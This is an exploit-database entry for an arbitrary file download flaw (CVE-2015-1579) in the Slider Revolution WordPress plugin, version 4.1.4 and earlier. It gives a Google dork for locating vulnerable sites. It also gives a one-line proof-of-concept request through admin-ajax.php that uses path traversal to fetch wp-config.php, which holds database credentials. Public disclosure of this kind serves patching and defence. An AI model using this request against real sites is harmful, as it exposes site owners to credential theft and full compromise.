WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download

Author: Claudio Viviani
type: webapps
platform: php
port: 
date_added: 2015-03-30 
date_updated: 2015-03-30 
verified: 0 
codes: CVE-2015-1579;OSVDB-109645;CVE-2014-9734 
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: 

# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380

# Software Link : Premium plugin

# Dork Google: revslider.php "index of"


# Date : 2014-07-24

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox


######################

# Description

Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability


######################

# PoC

http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


#####################

Discovered By : Claudio Viviani

        http://www.homelab.it
        info@homelab.it
        homelabit@protonmail.ch

        https://www.facebook.com/homelabit
        https://twitter.com/homelabit
        https://plus.google.com/+HomelabIt1/
        https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################